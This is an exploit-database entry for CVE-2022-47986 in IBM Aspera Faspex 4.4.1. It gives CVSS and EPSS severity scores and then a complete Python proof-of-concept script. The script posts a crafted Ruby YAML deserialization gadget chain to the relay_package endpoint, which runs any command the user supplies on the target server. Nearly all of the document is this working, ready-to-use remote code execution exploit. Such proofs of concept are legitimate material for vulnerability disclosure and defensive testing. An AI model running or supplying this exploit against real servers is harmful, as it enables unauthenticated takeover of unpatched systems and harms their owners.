IBM Aspera Faspex 4.4.1 - YAML deserialization (RCE)

2023-04-0700:00:00

Maurice Lambert

www.exploit-db.com

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.8 High

AI Score

Confidence

High

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.955 High

EPSS

Percentile

99.4%

JSON

# Exploit Title: IBM Aspera Faspex 4.4.1 - YAML deserialization (RCE)
# Date: 02/02/2023
# Exploit Author: Maurice Lambert <[email protected]>
# Vendor Homepage: https://www.ibm.com/
# Software Link: https://www.ibm.com/docs/en/aspera-faspex/5.0?topic=welcome-faspex
# Version: 4.4.1
# Tested on: Linux
# CVE : CVE-2022-47986

"""
This file implements a POC for CVE-2022-47986
an YAML deserialization that causes a RCE in
IBM Aspera Faspex (before 4.4.2).
"""

__version__ = "1.0.0"
__author__ = "Maurice Lambert"
__author_email__ = "[email protected]"
__maintainer__ = "Maurice Lambert"
__maintainer_email__ = "[email protected]"
__description__ = """
This file implements a POC for CVE-2022-47986
an YAML deserialization that causes a RCE in
IBM Aspera Faspex (before 4.4.2).
"""
license = "GPL-3.0 License"
__url__ = "https://github.com/mauricelambert/CVE-2022-47986"

copyright = """
CVE-2022-47986  Copyright (C) 2023  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
"""
__license__ = license
__copyright__ = copyright

__all__ = []

print(copyright)

from urllib.request import urlopen, Request
from sys import argv, exit, stderr, stdout
from shutil import copyfileobj
from json import dumps

def main() -> int:

    if len(argv) != 3:
        print("USAGES:", argv[0], "[hostname] [command]", file=stderr)
        return 1
    
    copyfileobj(
        urlopen(
            Request(
                argv[1] + "/aspera/faspex/package_relay/relay_package",
                method="POST",
                data=dumps({
                    "package_file_list": [
                        "/"
                    ],
                    "external_emails": f"""
---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "pew"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:PrettyPrint
             output: !ruby/object:Net::WriteAdapter
                 socket: &1 !ruby/module "Kernel"
                 method_id: :eval
             newline: "throw `{argv[2]}`"
             buffer: {{}}
             group_stack:
              - !ruby/object:PrettyPrint::Group
                break: true
         method_id: :breakable
""",
                    "package_name": "assetnote_pack",
                    "package_note": "hello from assetnote team",
                    "original_sender_name": "assetnote",
                    "package_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec",
                    "metadata_human_readable": "Yes",
                    "forward": "pew",
                    "metadata_json": '{}',
                    "delivery_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec",
                    "delivery_sender_name": "assetnote",
                    "delivery_title": "TEST",
                    "delivery_note": "TEST",
                    "delete_after_download": True,
                    "delete_after_download_condition": "IDK",
                }).encode()
            )
        ),
        stdout.buffer,
    )

    return 0


if __name__ == "__main__":
    exit(main())